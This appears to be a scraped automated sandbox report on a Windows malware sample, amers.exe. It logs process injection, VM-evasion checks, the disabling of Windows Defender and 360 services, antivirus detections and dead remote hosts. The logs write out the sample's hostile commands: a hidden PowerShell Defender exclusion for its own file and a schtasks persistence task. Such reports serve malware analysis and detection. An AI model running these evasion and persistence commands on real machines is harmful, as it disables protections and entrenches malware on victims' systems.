file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\ja\deepscan\dsr.dat
file	C:\Users\test22\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\tr\safemon\bp.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\zh-CN\safemon\wdi18n.sign
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\mui\en\Strings.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\es\safemon\drvmon.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\ru\ipc\appmon.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\en\deepscan\ssr.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\pt\deepscan\dsconz.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\libredlist.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\softmgr\OptadnNet.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\safemon\wduicfg.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\deepscan\dsbs.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\vi\deepscan\dsr.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\deepscan\dsark_win10.cat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\es\deepscan\ssr.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\zh-CN\safemon\drvmon.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\Utils\cef\2623\locales\en-US.pak
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\fr\ipc\filemon.dat
file	C:\Users\test22\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\hi\safemon\bp.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\ipc\appdef.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\deepscan\AVE\360ave_fp.def
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\config\lang\TR\SysSweeper.ui.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\netmon\360gmoptm.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\es\safemon\bp.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\pt\deepscan\art.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\zh-CN\ipc\appmon.dat
file	C:\Users\test22\AppData\Local\Temp\C__Users_test22_Pictures_360TS_Setup.exe.trt
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\ru\safemon\drvmon.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\zh-CN\deepscan\dsurls.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\Utils\cef\2623\natives_blob.bin
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\zh-CN\deepscan\dsr.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\zh-CN\safemon\bp.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\pt\ipc\360netd.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\safemon\cuconfig.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\pl\LibSDI.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\zh-TW\ipc\regmon.dat
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\vi\deepscan\dsconz.dat

Appends a known multi-family ransomware file extension to files that have been encrypted (6 events)

file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\deepscan\qex\MacroDef.enc
file	C:\Program Files (x86)\360\Total Security\deepscan\qex\patt.enc
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\deepscan\qex\qex.vdb.enc
file	C:\Program Files (x86)\360\Total Security\deepscan\qex\qex.vdb.enc
file	C:\Program Files (x86)\360\Total Security\deepscan\qex\MacroDef.enc
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\deepscan\qex\patt.enc

Resumed a suspended thread in a remote process potentially indicative of process injection (6 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 508 resumed a thread in remote process 1872
Process injection	Process 3092 resumed a thread in remote process 3504
Process injection	Process 3036 resumed a thread in remote process 3228
NtResumeThread May 31, 2024, 7:33 a.m.	thread_handle: 0x000000000000021c suspend_count: 1 process_identifier: 1872	1	0	0
NtResumeThread May 31, 2024, 7:34 a.m.	thread_handle: 0x00000318 suspend_count: 1 process_identifier: 3504	1	0	0
NtResumeThread May 31, 2024, 7:35 a.m.	thread_handle: 0x0000025c suspend_count: 1 process_identifier: 3228	1	0	0

Creates a suspicious Powershell process (5 events)

option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

Detects VirtualBox using WNetGetProviderName trick (1 event)

Time & API	Arguments	Status	Return	Repeated
WNetGetProviderNameW May 31, 2024, 7:34 a.m.	net_type: 0x00250000		1222	0

Detects Virtual Machines through their custom firmware (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation May 31, 2024, 7:34 a.m.	information_class: 76 (SystemFirmwareTableInformation)		3221225507	0

Detects VMWare through the in instruction feature (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 83 ec 04 e9 53 0f 00 00 exception.symbol: amers+0x1fbc91 exception.instruction: in eax, dx exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2079889 exception.address: 0x13fbc91 registers.esp: 2685364 registers.edi: 20930829 registers.eax: 1447909480 registers.ebp: 4009332756 registers.edx: 22104 registers.ebx: 1971327157 registers.esi: 20934993 registers.ecx: 20	1	0	0

Zeus P2P (Banking Trojan) (17 events)

mutex	Local\RstrMgr-3887CAB8-533F-4C85-B0DC-3E5639F8D511-Session0000
mutex	1830B7BD-F7A3-4c4d-989B-C004DE465EDE 3376
mutex	Local\RstrMgr3887CAB8-533F-4C85-B0DC-3E5639F8D511
mutex	1830B7BD-F7A3-4c4d-989B-C004DE465EDE 3780
mutex	1830B7BD-F7A3-4c4d-989B-C004DE465EDE 3184
mutex	1830B7BD-F7A3-4c4d-989B-C004DE465EDE 2544
udp	{u'src': u'192.168.56.103', u'dst': u'239.255.255.250', u'offset': 159147610, u'time': 12.732745885848999, u'dport': 1900, u'sport': 52763}
udp	{u'src': u'192.168.56.103', u'dst': u'54.77.42.29', u'offset': 164067353, u'time': 52.636337995529175, u'dport': 3478, u'sport': 28332}
udp	{u'src': u'192.168.56.103', u'dst': u'54.77.42.29', u'offset': 164067783, u'time': 52.636483907699585, u'dport': 3478, u'sport': 28333}
udp	{u'src': u'8.8.8.8', u'dst': u'192.168.56.103', u'offset': 164068643, u'time': 52.635878801345825, u'dport': 50674, u'sport': 53}
udp	{u'src': u'8.8.8.8', u'dst': u'192.168.56.103', u'offset': 164068843, u'time': 52.45216488838196, u'dport': 57986, u'sport': 53}
udp	{u'src': u'8.8.8.8', u'dst': u'192.168.56.103', u'offset': 164069053, u'time': 53.566006898880005, u'dport': 60141, u'sport': 53}
udp	{u'src': u'8.8.8.8', u'dst': u'192.168.56.103', u'offset': 164069352, u'time': 52.78903579711914, u'dport': 60225, u'sport': 53}
udp	{u'src': u'8.8.8.8', u'dst': u'192.168.56.103', u'offset': 164069552, u'time': 51.877480030059814, u'dport': 64530, u'sport': 53}
udp	{u'src': u'8.8.8.8', u'dst': u'192.168.56.103', u'offset': 164069760, u'time': 52.55841779708862, u'dport': 64631, u'sport': 53}
udp	{u'src': u'8.8.8.8', u'dst': u'192.168.56.103', u'offset': 164070049, u'time': 53.698814868927, u'dport': 65119, u'sport': 53}
udp	{u'src': u'8.8.8.8', u'dst': u'192.168.56.103', u'offset': 194204688, u'time': 64.84846997261047, u'dport': 52175, u'sport': 53}

Generates some ICMP traffic

Disables Windows Security features (15 events)

description	attempts to disable user access control	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{E107388D-1574-45A5-BFB5-BA5181548CEF}Machine\Software\Policies\Microsoft\Windows Defender\DisableRoutinelyTakingAction
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{E107388D-1574-45A5-BFB5-BA5181548CEF}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\2147812831
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{E107388D-1574-45A5-BFB5-BA5181548CEF}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{E107388D-1574-45A5-BFB5-BA5181548CEF}Machine\Software\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{E107388D-1574-45A5-BFB5-BA5181548CEF}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{E107388D-1574-45A5-BFB5-BA5181548CEF}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Exclusions_Extensions
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\2147814524
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{E107388D-1574-45A5-BFB5-BA5181548CEF}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{E107388D-1574-45A5-BFB5-BA5181548CEF}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\2147735503
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{E107388D-1574-45A5-BFB5-BA5181548CEF}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{E107388D-1574-45A5-BFB5-BA5181548CEF}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Extensions\exe
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\2147780199

Executed a process and injected code into it, probably while unpacking (50 out of 129 events)

Time & API	Arguments	Status	Return
NtResumeThread May 31, 2024, 7:29 a.m.	thread_handle: 0x000001e4 suspend_count: 1 process_identifier: 1712	1	0
CreateProcessInternalW May 31, 2024, 7:29 a.m.	thread_identifier: 2392 thread_handle: 0x000003e0 process_identifier: 2388 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1b29d73536\axplont.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1b29d73536\axplont.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1b29d73536\axplont.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003e8	1	1
NtResumeThread May 31, 2024, 7:29 a.m.	thread_handle: 0x00000198 suspend_count: 1 process_identifier: 2388	1	0
CreateProcessInternalW May 31, 2024, 7:29 a.m.	thread_identifier: 2824 thread_handle: 0x0000046c process_identifier: 2820 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1000004001\33333.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000004001\33333.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000004001\33333.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000470	1	1
CreateProcessInternalW May 31, 2024, 7:29 a.m.	thread_identifier: 2896 thread_handle: 0x00000450 process_identifier: 2892 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1000005001\fileosn.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000005001\fileosn.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000005001\fileosn.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000478	1	1
CreateProcessInternalW May 31, 2024, 7:29 a.m.	thread_identifier: 2968 thread_handle: 0x00000374 process_identifier: 2964 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1000006001\lumma1234.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000006001\lumma1234.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000006001\lumma1234.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000474	1	1
CreateProcessInternalW May 31, 2024, 7:29 a.m.	thread_identifier: 3036 thread_handle: 0x000003a8 process_identifier: 3032 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1000008001\gold.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000008001\gold.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000008001\gold.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000484	1	1
CreateProcessInternalW May 31, 2024, 7:29 a.m.	thread_identifier: 2088 thread_handle: 0x00000470 process_identifier: 2080 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1000009001\swizzzz.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000009001\swizzzz.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000009001\swizzzz.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000047c	1	1
CreateProcessInternalW May 31, 2024, 7:29 a.m.	thread_identifier: 1508 thread_handle: 0x00000450 process_identifier: 508 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1000020001\file300un.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000020001\file300un.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000020001\file300un.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000488	1	1
CreateProcessInternalW May 31, 2024, 7:30 a.m.	thread_identifier: 2220 thread_handle: 0x00000458 process_identifier: 2216 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1000031001\Newoff.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000031001\Newoff.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000031001\Newoff.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000498	1	1
NtResumeThread May 31, 2024, 7:29 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2892	1	0
NtResumeThread May 31, 2024, 7:29 a.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 2892	1	0
NtResumeThread May 31, 2024, 7:29 a.m.	thread_handle: 0x00000198 suspend_count: 1 process_identifier: 2892	1	0
NtResumeThread May 31, 2024, 7:29 a.m.	thread_handle: 0x0000037c suspend_count: 1 process_identifier: 2892	1	0
NtResumeThread May 31, 2024, 7:29 a.m.	thread_handle: 0x000003d4 suspend_count: 1 process_identifier: 2892	1	0
NtResumeThread May 31, 2024, 7:29 a.m.	thread_handle: 0x00000444 suspend_count: 1 process_identifier: 2892	1	0
NtResumeThread May 31, 2024, 7:29 a.m.	thread_handle: 0x000004fc suspend_count: 1 process_identifier: 2892	1	0
NtResumeThread May 31, 2024, 7:29 a.m.	thread_handle: 0x00000550 suspend_count: 1 process_identifier: 2892	1	0
NtGetContextThread May 31, 2024, 7:29 a.m.	thread_handle: 0x000000e0	1	0
NtGetContextThread May 31, 2024, 7:29 a.m.	thread_handle: 0x000000e0	1	0
NtResumeThread May 31, 2024, 7:29 a.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 2892	1	0
NtResumeThread May 31, 2024, 7:30 a.m.	thread_handle: 0x000004fc suspend_count: 1 process_identifier: 2892	1	0
NtResumeThread May 31, 2024, 7:30 a.m.	thread_handle: 0x000002b0 suspend_count: 1 process_identifier: 2892	1	0
NtResumeThread May 31, 2024, 7:30 a.m.	thread_handle: 0x0000027c suspend_count: 1 process_identifier: 2892	1	0
NtResumeThread May 31, 2024, 7:30 a.m.	thread_handle: 0x000002e8 suspend_count: 1 process_identifier: 2892	1	0
NtResumeThread May 31, 2024, 7:30 a.m.	thread_handle: 0x00000498 suspend_count: 1 process_identifier: 2892	1	0
NtResumeThread May 31, 2024, 7:30 a.m.	thread_handle: 0x00000504 suspend_count: 1 process_identifier: 2892	1	0
NtResumeThread May 31, 2024, 7:30 a.m.	thread_handle: 0x000004a8 suspend_count: 1 process_identifier: 2892	1	0
NtResumeThread May 31, 2024, 7:30 a.m.	thread_handle: 0x00000314 suspend_count: 1 process_identifier: 2892	1	0
NtResumeThread May 31, 2024, 7:31 a.m.	thread_handle: 0x0000051c suspend_count: 1 process_identifier: 2892	1	0
NtResumeThread May 31, 2024, 7:31 a.m.	thread_handle: 0x00000310 suspend_count: 1 process_identifier: 2892	1	0
NtResumeThread May 31, 2024, 7:31 a.m.	thread_handle: 0x000004fc suspend_count: 1 process_identifier: 2892	1	0
NtResumeThread May 31, 2024, 7:31 a.m.	thread_handle: 0x0000049c suspend_count: 1 process_identifier: 2892	1	0
NtResumeThread May 31, 2024, 7:33 a.m.	thread_handle: 0x00000000000000c4 suspend_count: 1 process_identifier: 508	1	0
NtResumeThread May 31, 2024, 7:33 a.m.	thread_handle: 0x0000000000000134 suspend_count: 1 process_identifier: 508	1	0
NtResumeThread May 31, 2024, 7:33 a.m.	thread_handle: 0x000000000000017c suspend_count: 1 process_identifier: 508	1	0
NtResumeThread May 31, 2024, 7:33 a.m.	thread_handle: 0x0000000000000204 suspend_count: 1 process_identifier: 508	1	0
NtResumeThread May 31, 2024, 7:33 a.m.	thread_handle: 0x0000000000000220 suspend_count: 1 process_identifier: 508	1	0
CreateProcessInternalW May 31, 2024, 7:33 a.m.	thread_identifier: 2272 thread_handle: 0x000000000000039c process_identifier: 2308 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\1000020001\file300un.exe" -Force filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000003a4	1	1
CreateProcessInternalW May 31, 2024, 7:33 a.m.	thread_identifier: 1648 thread_handle: 0x000000000000021c process_identifier: 1872 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000000000000218	1	1
NtUnmapViewOfSection May 31, 2024, 7:33 a.m.	base_address: 0x0000000000400000 region_size: 11206656 process_identifier: 1872 process_handle: 0x0000000000000218		-1073741799
NtAllocateVirtualMemory May 31, 2024, 7:33 a.m.	process_identifier: 1872 region_size: 32768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000218	1	0
WriteProcessMemory May 31, 2024, 7:33 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL#à"03 @@ @@3O@Ü`$3 H.text `.rsrcÜ@@@.reloc`(@B base_address: 0x0000000000400000 process_identifier: 1872 process_handle: 0x0000000000000218	1	1
WriteProcessMemory May 31, 2024, 7:33 a.m.	buffer: base_address: 0x0000000000402000 process_identifier: 1872 process_handle: 0x0000000000000218	1	1
WriteProcessMemory May 31, 2024, 7:33 a.m.	buffer: base_address: 0x0000000000404000 process_identifier: 1872 process_handle: 0x0000000000000218	1	1
WriteProcessMemory May 31, 2024, 7:33 a.m.	buffer: 03 base_address: 0x0000000000406000 process_identifier: 1872 process_handle: 0x0000000000000218	1	1
WriteProcessMemory May 31, 2024, 7:33 a.m.	buffer: @ base_address: 0x000000007efde008 process_identifier: 1872 process_handle: 0x0000000000000218	1	1
NtResumeThread May 31, 2024, 7:33 a.m.	thread_handle: 0x000000000000021c suspend_count: 1 process_identifier: 1872	1	0
NtResumeThread May 31, 2024, 7:33 a.m.	thread_handle: 0x0000023c suspend_count: 1 process_identifier: 2216	1	0
CreateProcessInternalW May 31, 2024, 7:33 a.m.	thread_identifier: 948 thread_handle: 0x00000260 process_identifier: 1952 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\test22\AppData\Local\Temp\1000031001\Newoff.exe" /F filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000268	1	1

Stops Windows services (5 events)

service	BAPIDRV (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BAPIDRV\Start)
service	360Box64 (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\360Box64\Start)
service	360netmon (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\360netmon\Start)
service	360AvFlt (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\360AvFlt\Start)
service	QHActiveDefense (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\Start)

File has been identified by 41 AntiVirus engines on VirusTotal as malicious (41 events)

Bkav	W32.AIDetectMalware
Lionic	Virus.Generic.AI.1!c
Elastic	malicious (high confidence)
Cynet	Malicious (score: 99)
Skyhigh	BehavesLike.Win32.Generic.tc
ALYac	Trojan.GenericKDZ.107058
Malwarebytes	Trojan.MalPack.Themida.Generic
VIPRE	Trojan.GenericKDZ.107058
BitDefender	Trojan.GenericKDZ.107058
Arcabit	Trojan.Generic.D1A232
Symantec	ML.Attribute.HighConfidence
tehtris	Generic.Malware
ESET-NOD32	a variant of Win32/Packed.Themida.HZB
APEX	Malicious
Avast	Win32:Evo-gen [Trj]
Kaspersky	HEUR:Trojan.Win32.Generic
MicroWorld-eScan	Trojan.GenericKDZ.107058
Rising	Trojan.Generic@AI.100 (RDML:XbIasFlFnAFTaDRvZjlizw)
Emsisoft	Trojan.GenericKDZ.107058 (B)
F-Secure	Trojan.TR/Crypt.TPM.Gen
McAfeeD	Real Protect-LS!F55D40B74D38
Trapmine	malicious.high.ml.score
FireEye	Generic.mg.f55d40b74d38f0fc
Sophos	Generic ML PUA (PUA)
Ikarus	PUA.Patched
Google	Detected
Avira	TR/Crypt.TPM.Gen
Gridinsoft	Trojan.Heur!.038120A1
Microsoft	Trojan:Win32/Wacatac.B!ml
ZoneAlarm	HEUR:Trojan.Win32.Generic
GData	Trojan.GenericKDZ.107058
AhnLab-V3	Trojan/Win.Generic.R640651
BitDefenderTheta	Gen:NN.ZexaF.36806.1DWaaGu9hAgi
DeepInstinct	MALICIOUS
VBA32	TScope.Malware-Cryptor.SB
Zoner	Probably Heur.ExeHeaderL
Tencent	Trojan-DL.Win32.Deyma.kh
MAX	malware (ai score=89)
Fortinet	W32/Themida.HZB!tr
AVG	Win32:Evo-gen [Trj]
CrowdStrike	win/malicious_confidence_100% (D)

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (3 events)

dead_host	147.45.47.149:80
dead_host	54.230.61.95:80
dead_host	192.168.56.103:49273

amers.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All